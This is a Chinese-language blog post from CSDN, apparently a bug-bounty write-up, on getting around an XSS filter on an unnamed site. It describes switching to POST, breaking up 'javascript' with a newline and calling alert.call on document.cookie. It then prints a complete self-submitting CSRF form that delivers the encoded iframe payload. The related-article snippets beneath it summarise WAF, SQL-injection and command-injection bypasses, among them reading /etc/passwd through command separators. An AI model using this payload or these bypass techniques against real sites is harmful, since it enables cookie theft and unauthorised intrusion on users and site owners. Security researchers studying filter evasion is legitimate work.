13. xss bypass 更改http请求方式+%0a绕过+自动触发csrfpoc

最新推荐文章于 2024-03-26 20:12:43 发布
最新推荐文章于 2024-03-26 20:12:43 发布
阅读量576 收藏
点赞数
分类专栏: SRC挖掘
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiru9972/article/details/113115801
版权

layout: post
title: 13. xss bypass
category: SRC
tags: SRC
keywords: SRC,XSS

前言

该篇记录为记录实际的src过程第13篇小文章,内容为某网站的xssbypass。

XSS特征

1.javascript,不能出现
2.常见的script iframe input标签不能出现
3.get类型
4.onxxx属性直接过滤了’onxx='这种模式
5.alert()被过滤

xss绕过payload

首先尝试get类型改成post类型,发现没有校验refer,可以通过csrf表单+postxss实现,post类型的waf情况就好一些了,iframe+src可以出现,但是javascript还是整体过滤掉了,这里用java%0ascript绕过,关键词alert无法实现,这里用aler.call(null,document.cookie)进行弹框。自动触发csrfpoc

<html>
<body>
<form method="POST" action="https://xxxxxx" id="test">
    <input type="hidden" name="xxxxxx" value="&quot;&gt;&lt;iframe&#47;src&#61;&quot;Java&#10;script&#58;a&#61;document&#59;alert&#46;call&#40;null&#44;a&#46;cookie&#41;&quot;&gt;&lt;&#47;iframe&gt;"></input>
</form>
<script>
var f=document.getElementById("test");
f.submit();
</script>

后话

xxxxx

_HWHXY
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
数据库语法整理及WAF绕过方式
RuoLi_s的博客
09-30 2284
关系型数据库 关系型数据库:指采用了关系模型来组织数据的数据库。 直白的说就是:关系型数据库最典型的数据结构是表,由二维表及其之间的联系所组成的一个数据组织 当今主流的关系型数据库有:Oracle,Microsoft SQL Server,MySQL,PostgreSQL,DB2, Microsoft Access, SQLite,MariaDB Oracle Oracle特性: select id,contents,time from news where news_id=1 ① union ② sele
XSSBypass:XSS绕过技术
05-17
**XSS(跨站脚本攻击)Bypass:探索XSS绕过技术** XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中注入恶意脚本,进而执行非授权的操作。当Web应用程序未能充分地验证和转义...
sqli-labs通关全解---有关过滤的绕过--less23,25~28,32~37--8
cyynid的博客
01-12 898
preg_replace()用于sql注入防护中,主要是将一些疑似攻击的代码进行替换处理,从而使得他无法达到攻击的目的,例如将‘/’替换成空格,将union替换成空格等,但是由于攻击方式的多样化和程序员的疏忽,往往无法过滤掉所有的攻击,甚至可以对此类过滤进行绕过处理。返回在预定义字符之前添加反斜杠的字符串。即将预定义的字符进行转义提示:该函数可用于为存储在数据库中的字符串以及数据库查询语句准备字符串。本文列举了一些对此类过滤方法的绕过手段,同样,也可以针对绕过手段,进行更加安全的过滤。
常见绕过方法总结
最新发布
weixin_66839513的博客
03-26 1350
两个空格代替一个空格,用Tab代替空格,%a0=空格。绕过的替代类型:%20 --代表url编码的空格,在空格过滤时可以代替。%09--用于在输出或显示文本时在该位置产生一个固定的水平间距,类似于tab键。%0a--代表换行符%0b--用于在输出或显示文本时在该位置产生一个固定的垂直间距,类似于tab键。%0c--%0d--回车换行%a0--代表的是非断行空格%00--%00代表的是ASCII码中的空字符/**/可以将空格字符替换成注释/**/,也可以使用内联注释,/!code。
几道webCTF——命令绕过
辰星的博客
03-14 1212
第一题无回显类型 这里的exec函数会把参数cmd的值当做命令执行,并且没有任何过滤和限制。 对于这种无回显的题目,我们可以选择重定向符>来查看和获取信息。 我们先使用cmd=ls>info然后查看info来获取当前路径下的文件信息,如下: 发现flag.php,我们再次使用重定向符把其内容写入一个文件,再读取这个文件即可,即使用cmd=cat fl*>info,再次前往页面查...
[CTF技巧]命令注入绕过总结
3tefanie丶zhou的博客
07-08 3497
命令分隔符 cat /etc/passwd;ls 分号 ; cmd1;cmd2(多条语句顺序执行) cat /etc/passwd && ls and && cmd1&&cmd2 与命令,cmd1成功则执行cmd2,cmd1失败则不执行cmd2 cat etc || ls or || cmd1 || cmd2 cmd1执行失败则执行cmd2,若cmd1执行成功则不执行cmd2 管道符 | | 管道符 管道符”|“
第十六节 unicode绕过过滤触发XSS-01
09-15
Unicode绕过过滤触发XSS是一种常见的Web应用程序漏洞攻击方式,攻击者可以使用Unicode字符来绕过输入验证和过滤机制,触发XSS攻击。因此,理解Unicode的基本概念和应用,并掌握XSS挖掘和Payload触发XSS的技术,是...
记录几种XSS绕过方式1
08-03
本文主要记录了几种XSS绕过的方法,帮助开发者理解攻击者可能使用的技巧,提高网站的安全性。 1. 服务端全局替换为空的特性: 当网站的过滤机制将某些特定字符如"onerror"或"script"替换为空时,攻击者可以利用...
SpringBoot +esapi 实现防止xss攻击 实战代码,满满干货
06-08
SpringBoot是一个流行的Java微服务框架,而ESAPI(Enterprise Security API)则是一个开源的安全库,旨在提供一种简便的方式来防御多种Web应用安全问题,包括XSS攻击。本实战代码将展示如何结合SpringBoot和ESAPI来...
XSS_Bypass_Cookbook_ver_3.0.pdf
08-07
目录 1 引言 1.1 研究范围 1.2 测试环境 2 Bypass Chrome XSS ...5.5 flash-xss自动触发 5.6 任意标签的自动触发 6 CSP Bypass 7 XSS tricks 7.1 firefox <50.02跨域问题 7.2 利用 opener进行钓鱼 8 结语 9 参考
XSS bypass
yggcwhat
05-01 994
XSS bypass
伪造XFF头绕过服务器IP过滤
weixin_34367845的博客
11-20 1232
IP伪造 TCP/IP层面的IP伪造很难实现,因为更改后很难实现正常的TCP通信,但在HTTP层面的伪造就显得很容易。可以通过伪造XFF头进行IP伪造 XFF字段 X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。通俗来说,就是浏览器访问网站的IP。一般格式: X-Forwarded-For:...
网络安全零基础入门(第十章-5)Bypass-绕过Waf(上)
素笺
05-25 685
每日一句:一定要在授权的范围内进行测试 本篇内容:什么是bypass      Waf检测机制      常见绕Waf手法      建议 一、什么是bypass 1、安装安全狗 没啥说的,直接百度安全狗,下载安装 注意的是:安装狗的时候,PHP study运行模式一定要跳到“系统服务” 2、什么是Waf WAF是一个缩写,他的全名叫做Web应用防护系统(Web Application Firewall),是通过通过执行一系列针对HTTP/HTTPS的安全策略来 专门为Web应用提供保.
xss跨站脚本攻击总结
太阳照耀我走四方
07-16 2110
svg onload="alert(1)"> //onerror 当加载文档或图像时发生某个错误无的弹窗语句onclick="alert(1)" //鼠标单击事件onmouseover="alert(1)" //鼠标悬浮事件最后还有很多的绕过姿势,推荐博客cookie:存储本地 存活时间较长 小中型session: 会话 存储服务器 存活时间较短 大型企业使用。
sql注入过waf
YouthBelief的博客
10-13 2669
sql注入过waf 安全狗3.5 1.内联注释+5五位数+%23+%0a 绕过 ?id=1 union select 1,2,3; 会被拦截 经过测验 union select 函数被拦截 构造 /*!06447%23%0a*/select 即可绕过 安全狗4.0 ?id=1 union select 1,2,3; 会被拦截 3.5版本绕过方法 失败 payload union /*!--+/*%0a select /*!1,2,*/3 分析 union /*! --+/*%0a
%0a可以做什么
weixin_30314631的博客
06-29 661
以通过这个正则表达式但是带入一个%0a,那么很好,漏洞就回到一个%0a能做什么上来了!黑锅已经总结了一个,在文件扩展后缀里1.php.jpg不能执行但是1.php.jpg%0a就可以了(linux环境下)另外如果在写文件的时候%0a就是一个新行了,对于数据库为文本的就是一个新记录还有呢?数据库在对待1和1%a的时候是不一样的,1%a被更新到一个int类型的字段可能会导致溢出...
WEB漏洞-XSS跨站之代码绕过httpOnly绕过
硫酸超的博客
08-16 4329
什么是HttpOnly? 如果您在cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击,具体一点的介绍请google进行搜索。 介绍 PHP设置COOKIE的HttpOnly属性 作用:仅仅是防止通过js脚本读取到cookie信息 虽然设置了httponly之后拿不到cookie,但是还是存在xss跨站语句,阻止的仅仅是获取cookie 对方开启HttpOnly你在盗取cookie失败的情况下可以采用其他方案 登陆后台权限方式 1.以cooki
某次XSS绕过总结
Fly_鹏程万里
10-18 2834
0x01 背景 前段时间苏宁src五倍积分,想着无事刷一刷玩玩,碰到一个反射型XSS,如下图: 插入&lt;img src=a&gt;测试正常(此处截图遗失,漏洞已修补),证明存在XSS,但是过滤了许多关键词,很难执行代码,于是有了接下来的一波绕过。 0x02 测试过滤机制 经不断测试,发现存在如下过滤机制: 1、”&lt;script”,”alert(“,”prompt(“...
xss攻击】靶场xss-labs
ssrf
12-04 1634
目录0x0010x0020x003 构造事件标签 对<>进行了实体编码0x004 构造事件标签 对<>替换为空0x005 对script进行过滤,没有对<>和javascript进行过滤0x006 大小写混写0x007 关键字双写0x008 编码绕过0x009 编码+检查字段绕过0x010 编码+检查字段绕过0x011 referer存在注入点 以下环境由开源靶场xss-labs搭建 0x001 0x002 payload "><script>al
3. XSS事件触发绕过
08-03
XSS事件触发绕过是指绕过XSS防御机制,成功触发XSS攻击。根据引用[1]和引用[2]的内容,可以得出一些绕过XSS防御的方法。其中一种方法是改变请求方式,将POST请求改为GET请求,然后通过访问URL来执行恶意代码。另一种...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值